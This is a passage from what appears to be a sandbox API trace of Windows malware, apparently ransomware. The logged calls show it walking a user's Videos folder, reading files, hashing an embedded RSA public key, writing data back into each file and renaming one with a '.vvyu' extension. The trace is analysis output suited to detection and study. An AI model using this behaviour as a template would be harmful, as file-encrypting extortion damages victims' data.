Size=0x108) returned 0x2c99d28 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0202.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90158 | out: hHeap=0x620000) returned 1 [0202.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.085] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x10d0a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x10d0a, lpOverlapped=0x0) returned 1 [0202.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.087] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x10d0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.087] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.088] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.089] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.089] CloseHandle (hObject=0x510) returned 1 [0202.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.091] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\8fbu8GjzXGN5dWk.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\8fbu8gjzxgn5dwk.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\8fbu8GjzXGN5dWk.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\8fbu8gjzxgn5dwk.avi.vvyu")) returned 1 [0202.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.093] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.098] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b16c390, ftCreationTime.dwHighDateTime=0x1d8a20e, ftLastAccessTime.dwLowDateTime=0xa025dff0, ftLastAccessTime.dwHighDateTime=0x1d8a25b, ftLastWriteTime.dwLowDateTime=0xa025dff0, ftLastWriteTime.dwHighDateTime=0x1d8a25b, nFileSizeHigh=0x0, nFileSizeLow=0xcd98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A8eg.mp4", cAlternateFileName="")) returned 1 [0202.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91678 [0202.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.099] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\A8eg.mp4") returned=".mp4" [0202.099] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\A8eg.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\a8eg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.108] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=52632) returned 1 [0202.108] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.112] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xcd72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.112] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.114] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.114] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xcd98, lpOverlapped=0x0) returned 1 [0202.116] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.117] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.117] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.117] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.118] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.118] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.118] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.118] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.118] GetLastError () returned 0x0 [0202.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.118] GetLastError () returned 0x0 [0202.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.119] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.119] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.119] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.119] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.119] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcda0) returned 0x2ea99b0 [0202.120] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90158 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e901a0 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.121] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea35c0 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0202.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.124] GetCurrentThreadId () returned 0x66c [0202.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8fb8 [0202.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.125] GetCurrentThreadId () returned 0x66c [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: 